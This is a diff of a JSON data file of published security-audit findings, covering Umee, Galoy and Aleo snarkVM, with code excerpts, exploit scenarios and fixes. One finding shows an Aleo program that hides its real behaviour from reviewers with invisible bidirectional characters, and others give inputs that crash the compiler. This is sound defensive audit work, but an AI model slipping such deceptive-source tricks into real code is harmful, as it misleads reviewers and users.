CVE-2020-8555, CWE-601, CVE-2019-11251, CVE-2019-1002101, CVE-2020-8563, CVE-2020-8557, CVE-2019-11244 Recommendations Short term, update the outdated and vulnerable dependencies. Even if they do not currently affect Umee or Peggo, a change in the way they are used could introduce a bug. Long term, integrate a dependency-checking tool such as nancy into the CI/CD pipeline. Frequently update any direct dependencies, and ensure that any indirect dependencies in upstream libraries remain up to date. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", + "title": "2. from_xy_coordinates function lacks checks and can panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "Unlike Group::from_x_coordinate , the Group::from_xy_coordinates function does not enforce the resulting point to be on the elliptic curve or in the correct subgroup. 
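Editor's aside: for intuition about the missing check in finding 2, a toy Python sketch of on-curve validation for a short Weierstrass curve y^2 = x^3 + ax + b over a small prime field. The parameters are toy values, not a snarkVM curve, and a full fix would also check subgroup membership, as the finding notes.

# Toy short Weierstrass curve y^2 = x^3 + ax + b over F_p (not a snarkVM curve).
P, A, B = 97, 2, 3

def from_xy_coordinates(x, y):
    """Sketch: return the point only if it satisfies the curve equation."""
    if (y * y - (x * x * x + A * x + B)) % P != 0:
        return None          # reject off-curve points instead of panicking
    return (x, y)

# (0, 10) satisfies 10^2 = 100 = 3 (mod 97) and b = 3, so it is on the curve.
assert from_xy_coordinates(0, 10) == (0, 10)
assert from_xy_coordinates(1, 1) is None  # 1 != 6 (mod 97): off-curve, rejected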
Two different behaviors can occur depending on the underlying curve: For a short Weierstrass curve (figure 2.1), the function will always succeed and not perform any membership checks on the point; this could lead to an invalid point being used in other curve operations, potentially leading to an invalid curve attack. /// Initializes a new affine group element from the given coordinates. fn from_coordinates (coordinates: Self ::Coordinates) -> Self { let (x, y, infinity) = coordinates; Self { x, y, infinity } } Figure 2.1: No curve membership checks present at curves/src/templates/short_weierstrass_jacobian/affine.rs#L103-L107 For a twisted Edwards curve (figure 2.2), the function will panic if the point is not on the curve, unlike the from_x_coordinate function, which returns an Option . /// Initializes a new affine group element from the given coordinates. fn from_coordinates (coordinates: Self ::Coordinates) -> Self { let (x, y) = coordinates; let point = Self { x, y }; assert! (point.is_on_curve()); point } Figure 2.2: curves/src/templates/twisted_edwards_extended/affine.rs#L102-L108 Exploit Scenario An attacker is able to construct an invalid point for the short Weierstrass curve, potentially revealing secrets if this point is used in scalar multiplications with secret data. Recommendations Short term, make the output type similar to the from_x_coordinate function, returning an Option . Enforce curve membership on the short Weierstrass implementation and consider returning None instead of panicking when the point is not on the twisted Edwards curve.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "25. Insecure storage of price-feeder keyring passwords ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Users can store oracle keyring passwords in the price-feeder configuration file. However, the price-feeder stores these passwords in plaintext and does not provide a warning if the configuration file has overly broad permissions (like those shown in figure 25.1). Additionally, neither the price-feeder README nor the relevant documentation string instructs users to provide keyring passwords via standard input (figure 25.2), which is a safer approach. Moreover, neither source provides information on different keyring back ends, and the example price-feeder configuration uses the \"test\" back end. An attacker with access to the configuration file on a user's system, or to a backup of the configuration file, could steal the user's keyring information and hijack the price-feeder oracle instance. $ ls -la ./price-feeder/price-feeder.example.toml -rwxrwxrwx 1 dc dc 848 Feb 6 10:37 ./price-feeder/price-feeder.example.toml $ grep pass ./price-feeder/price-feeder.example.toml pass = \"exampleKeyringPassword\" $ ~/go/bin/price-feeder ./price-feeder/price-feeder.example.toml 10:42AM INF starting price-feeder oracle... 10:42AM ERR oracle tick failed error=\"key with address A4F324A31DECC0172A83E57A3625AF4B89A91F1F not found: key not found\" module=oracle 10:42AM INF starting price-feeder server... listen_addr=0.0.0.0:7171 Figure 25.1: The price-feeder does not warn the user if the configuration file used to store the keyring password in plaintext has overly broad permissions. // CreateClientContext creates an SDK client Context instance used for transaction // generation, signing and broadcasting. 
func (oc OracleClient) CreateClientContext() (client.Context, error ) { var keyringInput io.Reader if len (oc.KeyringPass) > 0 { keyringInput = newPassReader(oc.KeyringPass) } else { keyringInput = os.Stdin } Figure 25.2: The price-feeder supports the use of standard input to provide keyring passwords. ( umee/price-feeder/oracle/client/client.go#L184-L192 ) Exploit Scenario A user sets up a price-feeder oracle and stores the keyring password in the price-feeder conguration le, which has been miscongured with overly broad permissions. An attacker gains access to another user account on the user's machine and is able to read the price-feeder oracle's keyring password. The attacker uses that password to access the keyring data and can then control the user's oracle account. Recommendations Short term, take the following steps: Recommend that users provide keyring passwords via standard input. Check the permissions of the conguration le. If the permissions are too broad, provide an error warning the user of the issue, as openssh does when it nds that a private key le has overly broad permissions. Document the risks associated with storing a keyring password in the conguration le. Improve the price-feeder s keyring-related documentation. Include a link to the Cosmos SDK keyring documentation so that users can learn about dierent keyring back ends and the addition of keyring entries, among other concepts.", + "title": "3. Blake2Xs implementation fails to provide the requested number of bytes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The Blake2Xs implementation returns an empty byte array when the requested number of bytes is between u16::MAX-30 and u16::MAX . Blake2Xs is an extendable-output hash function (XOF): it receives a parameter called xof_digest_length that determines how many bytes the hash function should return. When computing the necessary number of rounds, there is an integer overflow if xof_digest_length is between u16::MAX-30 and u16::MAX . This integer overflow causes the number of rounds to be zero and the resulting hash to have zero bytes. fn evaluate(input: &[u8], xof_digest_length: u16, persona: &[u8]) -> Vec<u8> { assert!(xof_digest_length > 0, \"Output digest must be of non-zero length\"); assert!(persona.len() <= 8, \"Personalization may be at most 8 characters\"); // Start by computing the digest of the input bytes. let xof_digest_length_node_offset = (xof_digest_length as u64) << 32; let input_digest = blake2s_simd::Params::new() .hash_length(32) .node_offset(xof_digest_length_node_offset) .personal(persona) .hash(input); let mut output = vec![]; let num_rounds = (xof_digest_length + 31) / 32; for node_offset in 0..num_rounds { Figure 3.1: console/algorithms/src/blake2xs/mod.rs#L32-L47 The finding is informational because the hash function is used only in the hash_to_curve routine, and never with an attacker-controlled digest length parameter. The currently used value is the size of the generator, which is not expected to reach values near u16::MAX . Exploit Scenario The Blake2Xs hash function is used with the maximum number of bytes, u16::MAX , to compare password hashes. Due to the vulnerability, any password will match the correct one since the hash output is always the empty array, allowing an attacker to gain access. Recommendations Short term, upcast the xof_digest_length variable to a larger type before the sum.
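A minimal sketch of that upcast (a hypothetical standalone helper; the actual code computes the count inline, as shown in figure 3.1):

/// Compute the Blake2Xs round count, widening to u32 before the addition so
/// that digest lengths near u16::MAX can no longer wrap the count to zero.
fn num_rounds(xof_digest_length: u16) -> u32 {
    assert!(xof_digest_length > 0, "Output digest must be of non-zero length");
    (xof_digest_length as u32 + 31) / 32
}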
This will prevent the overflow while enforcing the u16::MAX bound on the requested digest length. 4. Blake2Xs implementation's node offset definition differs from specification Severity: Informational Difficulty: High Type: Cryptography Finding ID: TOB-ALEOA-4 Target: console/algorithms/src/blake2xs/mod.rs", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "26. Insu\u0000cient validation of genesis parameters ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "A few system parameters must be set correctly for the system to function properly. The system checks the parameter input against minimum and maximum values (not always correctly) but does not check the correctness of the parameters dependencies. Exploit Scenario When preparing a protocol upgrade, the Umee team accidentally introduces an invalid value into the conguration le. As a result, the upgrade is deployed with an invalid or unexpected parameter. Recommendations Short term, implement proper validation of congurable values to ensure that the following expected invariants hold: BaseBorrowRate <= KinkBorrowRate <= MaxBorrowRate LiquidationIncentive <= some maximum CompleteLiquidationThreshold > 0 (The third invariant is meant to prevent division by zero in the Interpolate method.)", + "title": "5. Compiling cast instructions can lead to panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The output_types function of the cast instruction assumes that the number of record or interface fields equals the number of input types. // missing checks for (input_type, (_, entry_type)) in input_types.iter().skip(2).zip_eq(record.entries()) { Figure 5.1: Invocation of zip_eq on two iterators that differ in length ( cast.rs:401 ) Therefore, compiling a program with an unmatched cast instruction will cause a runtime panic. The program in figure 5.2 casts two registers into an interface type with only one field: program aleotest.aleo; interface message: amount as u64; function test: input r0 as u64.private; cast r0 r0 into r1 as message; Figure 5.2: Program panics during compilation Figure 5.3 shows a program that will panic when compiling because it casts three registers into a record type with two fields: program aleotest.aleo; record token: owner as address.private; gates as u64.private; function test: input r0 as address.private; input r1 as u64.private; cast r0 r1 r1 into r2 as token.record; Figure 5.3: Program panics during compilation The following stack trace is printed in both cases: as core::iter::traits::iterator::Iterator>::next::h5c767bbe55881ac0 snarkvm_compiler::program::instruction::operation::cast::Cast::output_types::h3d1251fbb81d620f snarkvm_compiler::process::stack::helpers::insert::>::check_instruction::h6bf69c769d8e877b snarkvm_compiler::process::stack::Stack::new::hb1c375f6e4331132 snarkvm_compiler::process::deploy::>::deploy::hd75a28b4fc14e19e snarkvm_fuzz::harness::fuzz_program::h131000d3e1900784 Figure 5.4: Stack trace This bug was discovered through fuzzing with LibAFL . Recommendations Short term, add a check to validate that the number of Cast arguments equals the number of record or interface fields. Long term, review all other uses of zip_eq and check the length of their iterators.", "labels": [ "Trail of Bits", "Severity: Low", + "Difficulty: Low" + ] + },
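The short-term check recommended above could be as small as this sketch (hypothetical helper names; the actual fix belongs in Cast::output_types, before the zip_eq):

/// Return an error, rather than panicking, when a cast's operand count does
/// not match the number of fields in the target record or interface type.
fn check_cast_arity(num_operands: usize, num_fields: usize) -> Result<(), String> {
    match num_operands == num_fields {
        true => Ok(()),
        false => Err(format!("Cast expects {num_fields} operands, found {num_operands}")),
    }
}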
+ { + "title": "6. Displaying an Identifier can cause a panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The Identifier of a program uses Fields internally. It is possible to construct an Identifier from an arbitrary bits array. However, the implementation of the Display trait of Identifier expects that this arbitrary data is valid UTF-8. Creating an identifier from a bytes array already checks whether the bytes are valid UTF-8. The following formatting function tries to create a UTF-8 string regardless of the bits of the field. fn fmt(&self, f: &mut Formatter) -> fmt::Result { // Convert the identifier to bits. let bits_le = self.0.to_bits_le(); // Convert the bits to bytes. let bytes = bits_le .chunks(8) .map(|byte| u8::from_bits_le(byte).map_err(|_| fmt::Error)) .collect::<Result<Vec<u8>, _>>()?; // Parse the bytes as a UTF-8 string. let string = String::from_utf8(bytes).map_err(|_| fmt::Error)?; ... } Figure 6.1: Relevant code ( parse.rs:76 ) As a result, constructing an Identifier from an invalid UTF-8 bit array will cause a runtime error when the Identifier is displayed. The following test shows how to construct such an Identifier . #[test] fn test_invalid_identifier() { let invalid: &[u8] = &[112, 76, 113, 165, 54, 175, 250, 182, 196, 85, 111, 26, 71, 35, 81, 194, 56, 50, 216, 176, 126, 15]; let bits: Vec<bool> = invalid.iter().flat_map(|n| [n & (1 << 7) != 0, n & (1 << 6) != 0, n & (1 << 5) != 0, n & (1 << 4) != 0, n & (1 << 3) != 0, n & (1 << 2) != 0, n & (1 << 1) != 0, n & (1 << 0) != 0]).collect(); let name = Identifier::from_bits_le(&bits).unwrap(); let network = Identifier::from_str(\"aleo\").unwrap(); let id = ProgramID::::from((name, network)); println!(\"{:?}\", id.to_string()); } // a Display implementation returned an error unexpectedly: Error // thread 'program::tests::test_invalid_identifier' panicked at 'a Display implementation returned an error unexpectedly: Error', library/core/src/result.rs:1055:23 4: ::to_string at /rustc/dc80ca78b6ec2b6bba02560470347433bcd0bb3c/library/alloc/src/string.rs:2489:9 5: snarkvm_compiler::program::tests::test_invalid_identifier at ./src/program/mod.rs:650:26 Figure 6.2: Test causing a panic The testnet3_add_fuzz_tests branch has a workaround that prevents finding this issue. Using the arbitrary crate, it is likely that non-UTF-8 bit-strings end up in identifiers. We suggest fixing this bug instead of using the workaround. This bug was discovered through fuzzing with LibAFL. Recommendations Short term, we suggest using a placeholder like \"unprintable identifier\" instead of returning a formatting error. Alternatively, a check for UTF-8 could be added in Identifier::from_bits_le .", + "labels": [ + "Trail of Bits", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "31. Lack of prioritization of Peggo orchestrator messages ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Peggo orchestrator messages, like oracle messages ( TOB-UMEE-20 ), are not prioritized over other transactions for inclusion in a block. As a result, if the network is highly congested, orchestrator transactions may not be included in the earliest possible block. Although the Umee system could increase the fee charged for including a Peggo orchestrator message in a block, that solution is suboptimal and may not work.
Tactics for prioritizing important transactions include the following: Using the custom CheckTx implementation introduced in Tendermint version 0.35 , which returns a priority argument Reimplementing part of the Tendermint engine , as Terra Money did Using Substrates dispatch classes , which allow developers to mark transactions as normal , operational , or mandatory Exploit Scenario A user sends tokens from Ethereum to Umee by calling Gravity Bridges sendToCosmos function. When validators notice the transaction in the Ethereum logs, they send MsgSendToCosmosClaim messages to Umee. However, 34% of the messages are front-run by an attacker, eectively stopping Umee from acknowledging the token transfer. Recommendations Short term, use a custom CheckTx method to prioritize Peggo orchestrator messages. Long term, ensure that operations that aect the whole system cannot be front-run or delayed by attackers or blocked by network congestion.", + "title": "7. Build script causes compilation to rerun ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "Using the current working directory as a rerun condition causes unnecessary recompilations, as any change in cargos target directory will trigger a compilation. // Re-run upon any changes to the workspace. println!( \"cargo:rerun-if-changed=.\" ); Figure 7.1: Rerun condition in build.rs ( build.rs:57 ) The root build script also implements a check that all les include the proper license. However, the check is insucient to catch all cases where developers forget to include a license. Adding a new empty Rust le without modifying any other le will not make the check in the build.rs fail because the check is not re-executed. Recommendations Short term, remove the rerun condition and use the default Cargo behavior . By default cargo reruns the build.rs script if any Rust le in the source tree has changed. Long term, consider using a git commit hook to check for missing licenses at the top of les. An example of such a commit hook can be found here .", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: Undetermined" ] }, { - "title": "32. Failure of a single broadcast Ethereum transaction causes a batch-wide failure ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The Peggo orchestrator broadcasts Ethereum events as Cosmos messages and sends them in batches of 10 ( at least by default ). According to a code comment (gure 32.1), if the execution of a single message fails on the Umee side, all of the other messages in the batch will also be ignored. We set the severity of this nding to undetermined because it is unclear whether it is exploitable. // runTx processes a transaction within a given execution mode, encoded transaction // bytes, and the decoded transaction itself. All state transitions occur through // a cached Context depending on the mode provided. State only gets persisted // if all messages get executed successfully and the execution mode is DeliverTx. // Note, gas execution info is always returned. A reference to a Result is // returned if the tx does not run out of gas and if all the messages are valid // and execute successfully. An error is returned otherwise. 
func (app *BaseApp) runTx(mode runTxMode, txBytes [] byte , tx sdk.Tx) (gInfo sdk.GasInfo, result *sdk.Result, err error ) { Figure 32.1: cosmos-sdk/v0.45.1/baseapp/baseapp.go#L568-L575 Recommendations Short term, review the practice of ignoring an entire batch of Peggo-broadcast Ethereum events when the execution of one of them fails on the Umee side, and ensure that it does not create a denial-of-service risk. Alternatively, change the system such that it can identify any messages that will fail and exclude them from the batch. Long term, generate random messages corresponding to Ethereum events and use them in testing to check the systems handling of failed messages.", + "title": "8. Invisible codepoints are supported ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The current parser allows any Unicode character in strings or comments, which can include invisible bidirectional override characters . Using such characters can lead to dierences between the code reviewed in a pull request and the compiled code. Figure 8.1 shows such a program: since r2 and r3 contain the hash of the same string, r4 is true , and r5 equals r1 , the output token has the amount eld set to the second input. However, the compiled program always returns a token with a zero amount . // Program comparing aleo with aleo string program aleotest.aleo; record token: owner as address.private; gates as u64.private; amount as u64.private; function mint: input r0 as address.private; input r1 as u64.private; hash.psd2 \"aleo\" into r2; \" into r3; hash.psd2 \"aleo // Same string again is.eq r2 r3 into r4; // r4 is true because r2 == r3 ternary r4 r1 0u64 into r5; // r5 is r1 because r4 is true cast r0 0u64 r5 into r6 as token.record; output r6 as token.record; Figure 8.1: Aleo program that evaluates unexpectedly By default, VSCode shows the Unicode characters (gure 8.2). Google Docs and GitHub display the source code as in gure 8.1. Figure 8.2: The actual source This nding is inspired by CVE-2021-42574 . Recommendations Short term, reject the following code points: U+202A, U+202B, U+202C, U+202D, U+202E, U+2066, U+2067, U+2068, U+2069. This list might not be exhaustive. Therefore, consider disabling all non-ASCII characters in the Aleo language. In the future, consider introducing escape sequences so users can still use bidirectional code points if there is a legitimate use case.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Medium" ] }, { - "title": "1. Insecure download process for the yq tool ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Dockerle uses the Wget utility to download the yq tool but does not verify the le it has downloaded by its checksum or signature. Without verication, an archive that has been corrupted or modied by a malicious third party may not be detected. Figures 1.1 and 1.2 show cases in which a tool is downloaded without verication of its checksum. 6 RUN wget https://github.com/mikefarah/yq /releases/download/v4.17.2/yq_linux_386.tar.gz -O - | \\ 7 tar xz && mv yq_linux_386 /usr/bin/yq Figure 1.1: The Dockerle downloads and unarchives the yq tool. 
( ci/image/Dockerfile#67 ) 41 wget https://github.com/bodymindarts/cepler /releases/download/v ${ cepler_version } /cepler-x 86_64-unknown-linux-musl- ${ cepler_version } .tar.gz \\ 42 && tar -zxvf cepler-x86_64-unknown-linux-musl- ${ cepler_version } .tar.gz \\ 43 && mv cepler-x86_64-unknown-linux-musl- ${ cepler_version } /cepler /usr/local/bin \\ 44 && chmod +x /usr/local/bin/cepler \\ 45 && rm -rf ./cepler-* Figure 1.2: The bastion-startup script downloads and unarchives the cepler tool. ( modules/inception/gcp/bastion-startup.tmpl#4145 ) Exploit Scenario An attacker gains access to the GitHub repository from which yq is downloaded. The attacker then modies the binary to create a reverse shell upon yq s startup. When a user runs the Dockerle, the attacker gains access to the users container. Recommendations Short term, have the Dockerle and other scripts in the solution verify each le they download by its checksum . Long term, implement checks to ensure the integrity of all third-party components used in the solution and periodically check that all components are downloaded from encrypted URLs.", + "title": "9. Merkle tree constructor panics with large leaf array ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The Merkle tree constructor panics or returns a malformed Merkle tree when the provided leaves array has more than usize::MAX/2 elements. To build a Merkle tree, the constructor receives the necessary array of leaves. Being a binary tree, the nal total number of nodes is computed using the smallest power of two above the number of leaves given: pub fn new (leaf_hasher: & LH , path_hasher: & PH , leaves: & [LH::Leaf]) -> Result < Self > { // Ensure the Merkle tree depth is greater than 0. ensure!(DEPTH > 0 , \"Merkle tree depth must be greater than 0\" ); // Ensure the Merkle tree depth is less than or equal to 64. ensure!(DEPTH <= 64 u8 , \"Merkle tree depth must be less than or equal to 64\" ); // Compute the maximum number of leaves. let max_leaves = leaves.len().next_power_of_two() ; // Compute the number of nodes. let num_nodes = max_leaves - 1 ; Figure 9.1: console/algorithms/src/blake2xs/mod.rs#L32-L47 The next_power_of_two function will panic in debug mode, and return 0 in release mode if the number is larger than (1 << (N-1)) . For the usize type, on 64-bit machines, the function returns 0 for numbers above 2 63 . On 32-bit machines, the necessary number of leaves would be at least 1+2 31 . Exploit Scenario An attacker triggers a call to the Merkle tree constructor with 1+2 31 leaves, causing the 32-bit machine to abort due to a runtime error or to return a malformed Merkle tree. Recommendations Short term, use checked_next_power_of_two and check for success. Check all other uses of the next_power_of_two for similar issues.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: High" ] }, { - "title": "2. Use of unencrypted HTTP scheme ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Galoy ipfetcher module uses the unencrypted HTTP scheme (gure 2.1). As a result, an attacker in the same network as the host invoking the code in gure 2.1 could intercept and modify both the request and ipfetcher s response to it, potentially accessing sensitive information. 
8 9 const { data } = await axios.get( ` http ://proxycheck.io/v2/ ${ ip } ?key= ${ PROXY_CHECK_APIKEY } &vpn=1&asn=1` , 10 ) Figure 2.1: src/services/ipfetcher/index.ts#810 Exploit Scenario Eve gains access to Alices network and obtains Alices PROXY_CHECK_APIKEY by observing the unencrypted network trac. Recommendations Short term, change the URL scheme used in the ipfetcher service to HTTPS. Long term, use tools such as WebStorm code inspections to nd other uses of unencrypted URLs.", + "title": "10. Downcast possibly truncates value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "To validate the console's Ciphertext eld vector length against a u32 constant, the program downcasts the length from usize to u32 . This could cause a value truncation and a successful write when an error should occur. Then, the program downcasts the value to a u16 , not checking rst if this is safe without truncation. fn write_le (& self , mut writer: W ) -> IoResult <()> { // Ensure the number of field elements does not exceed the maximum allowed size. if self . 0. len() as u32 > N::MAX_DATA_SIZE_IN_FIELDS { return Err (error( \"Ciphertext is too large to encode in field elements.\" )); } // Write the number of ciphertext field elements. ( self . 0. len() as u16 ).write_le(& mut writer)?; // Write the ciphertext field elements. self . 0. write_le(& mut writer) } } Figure 10.1: console/program/src/data/ciphertext/bytes.rs#L36-L49 Figure 10.2 shows another instance where the value is downcasted to u16 without checking if this is safe: // Ensure the number of field elements does not exceed the maximum allowed size. match num_fields <= N::MAX_DATA_SIZE_IN_FIELDS as usize { // Return the number of field elements. true => Ok ( num_fields as u16 ), Figure 10.2: console/program/src/data/ciphertext/size_in_fields.rs#L21-L30 A similar downcast is present in the Plaintext size_in_fields function . Currently, this downcast causes no issue because the N::MAX_DATA_SIZE_IN_FIELDS constant is less than u16::MAX . However, if this constant were changed, truncating downcasts could occur. Recommendations Short term, upcast N::MAX_DATA_SIZE_IN_FIELDS in Ciphertext::write_le to usize instead of downcasting the vector length, and ensure that the downcasts to u16 are safe.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "3. Lack of expiration and revocation mechanism for JWTs ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Galoy system uses JSON web tokens (JWTs) for authentication. A user obtains a new JWT by calling the userLogin GraphQL mutation. Once a token has been signed, it is valid forever; the platform does not set an expiration time for tokens and cannot revoke them. 7 export const createToken = ({ 8 uid, 9 network, 10 }: { 11 uid: UserId 12 network: BtcNetwork 13 }): JwtToken => { 14 return jwt.sign({ uid, network }, JWT_SECRET, { // (...) 25 algorithm: \"HS256\" , 26 }) as JwtToken 27 } Figure 3.1: The creation of a JWT ( src/services/jwt.ts#727 ) Exploit Scenario An attacker obtains a users JWT and gains persistent access to the system. The attacker then engages in destructive behavior. The victim eventually notices the behavior but does not have a way to stop it. Recommendations Short term, consider setting an expiration time for JWTs, and implement a mechanism for revoking tokens. 
That way, if a JWT is leaked, an attacker will not gain persistent access to the system.", + "title": "11. Plaintext::from_bits_* functions assume array has elements ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The from_bits_le function assumes that the provided array is not empty, immediately indexing the first and second positions without a length check: /// Initializes a new plaintext from a list of little-endian bits *without* trailing zeros. fn from_bits_le(bits_le: &[bool]) -> Result<Self> { let mut counter = 0; let variant = [bits_le[counter], bits_le[counter + 1]]; counter += 2; Figure 11.1: circuit/program/src/data/plaintext/from_bits.rs#L22-L28 A similar pattern is present in the from_bits_be function in both the Circuit and Console implementations of Plaintext . The function should first check whether the array is empty before accessing elements, or documentation should be added so that the function caller enforces this. Recommendations Short term, check whether the array is empty before accessing elements, or add documentation so that the function caller enforces this.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "4. Use of insecure function to generate phone codes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Galoy application generates a verication code by using the JavaScript function Math.random() , which is not a cryptographically secure pseudorandom number generator (CSPRNG) . const randomIntFromInterval = (min, max) => Math .floor( Math .random() * (max - min + 1 ) + min) 10 11 12 // (...) 82 83 84 85 86 87 const code = String ( randomIntFromInterval( 100000 , 999999 ) ) as PhoneCode const galoyInstanceName = getGaloyInstanceName() const body = ` ${ code } is your verification code for ${ galoyInstanceName } ` const result = await PhoneCodesRepository().persistNew({ 88 phone: phoneNumberValid , 89 code, 90 }) 91 92 93 94 95 96 } if (result instanceof Error ) return result const sendTextArguments = { body, to: phoneNumberValid , logger } return TwilioClient().sendText(sendTextArguments) Figure 4.1: src/app/users/request-phone-code.ts#1096 Exploit Scenario An attacker repeatedly generates verication codes and analyzes the values and the order of their generation. The attacker attempts to deduce the pseudorandom number generator's internal state. If successful, the attacker can then perform an oine calculation to predict future verication codes. Recommendations Short term, replace Math.random() with a CSPRNG. Long term, always use a CSPRNG to generate random values for cryptographic operations.", + "title": "12. Arbitrarily deep recursion causes stack exhaustion ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The codebase has recursive functions that operate on arbitrarily deep structures. This causes a runtime error: the program's stack is exhausted by a very large number of recursive calls. The Plaintext parser allows an arbitrarily deep interface value such as {bar: {bar: {bar: {... bar: true}}} . Since the formatting function is recursive, a sufficiently deep interface will exhaust the stack in the fmt_internal recursion. We confirmed this finding with a 2880-level nested interface.
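Such an input is cheap to generate; a throwaway helper along these lines (hypothetical, not from the report) builds the nested interface literal:

/// Build a plaintext literal of the form {bar: {bar: ... true ...}},
/// nested `depth` levels deep; nested_interface(2880) reproduces the
/// input used to confirm the finding.
fn nested_interface(depth: usize) -> String {
    let mut value = String::from("true");
    for _ in 0..depth {
        value = format!("{{bar: {value}}}");
    }
    value
}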
Parsing the interface with Plaintext::from_str succeeds, but printing the result causes stack exhaustion: #[test] fn test_parse_interface3 () -> Result <()> { let plain = Plaintext::::from_str( /* too long to display */ )?; println! ( \"Found: {plain}\\n\" ); Ok (()) } // running 1 test // thread 'data::plaintext::parse::tests::test_deep_interface' has overflowed its stack // fatal runtime error: stack overflow // error: test failed, to rerun pass '-p snarkvm-console-program --lib' Figure 12.1: console/algorithms/src/blake2xs/mod.rs#L32-L47 The same issue is present on the record and record entry formatting routines. The Record::find function is also recursive, and a suciently large argument array could also lead to stack exhaustion. However, we did not conrm this with a test. Exploit Scenario An attacker provides a program with a 2880-level deep interface, which causes a runtime error if the result is printed. Recommendations Short term, add a maximum depth to the supported data structures. Alternatively, implement an iterative algorithm for creating the displayed structure.", "labels": [ "Trail of Bits", "Severity: Low", @@ -3832,69 +6540,69 @@ ] }, { - "title": "5. Redundant basic authentication method ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Galoy application implements a basic authentication method (gure 5.1) that is redundant because the apiKey is not being used. Superuous authentication methods create new attack vectors and should be removed from the codebase. 1 2 3 import express from \"express\" const formatError = new Error ( \"Format is Authorization: Basic \" ) 4 5 export default async function ( 6 req: express.Request , 7 _res: express.Response , 8 next: express.NextFunction , 9 ) { 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 const authorization = req.headers[ \"authorization\" ] if (!authorization) return next() const parts = authorization.split( \" \" ) if (parts.length !== 2 ) return next() const scheme = parts[ 0 ] if (! /Basic/i .test(scheme)) return next() const credentials = Buffer. from (parts[ 1 ], \"base64\" ).toString().split( \":\" ) if (credentials.length !== 2 ) return next(formatError) const [apiKey, apiSecret] = credentials if (!apiKey || !apiSecret) return next(formatError) 25 req[ \"apiKey\" ] = apiKey 26 req[ \"apiSecret\" ] = apiSecret 27 next() 28 } Figure 5.1: The basic authentication method implementation ( src/servers/middlewares/api-key-auth.ts#128 ) Recommendations Short term, remove the apiKey -related code. Long term, review and clearly document the Galoy authentication methods.", + "title": "13. Inconsistent pair parsing ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The codebase has several implementations to parse pairs from strings of the form key: value depending on the expected type of value . However, these parsers also handle whitespaces around the colon dierently. As an example, gure 13.1 shows a parser that allows whitespaces before the colon, while gure 13.2 shows one that does not: fn parse_pair (string: &str ) -> ParserResult <(Identifier, Plaintext)> { // Parse the whitespace and comments from the string. let (string, _) = Sanitizer::parse(string)?; // Parse the identifier from the string. let (string, identifier) = Identifier::parse(string)?; // Parse the whitespace from the string. let (string, _) = Sanitizer::parse_whitespaces(string)?; // Parse the \":\" from the string. 
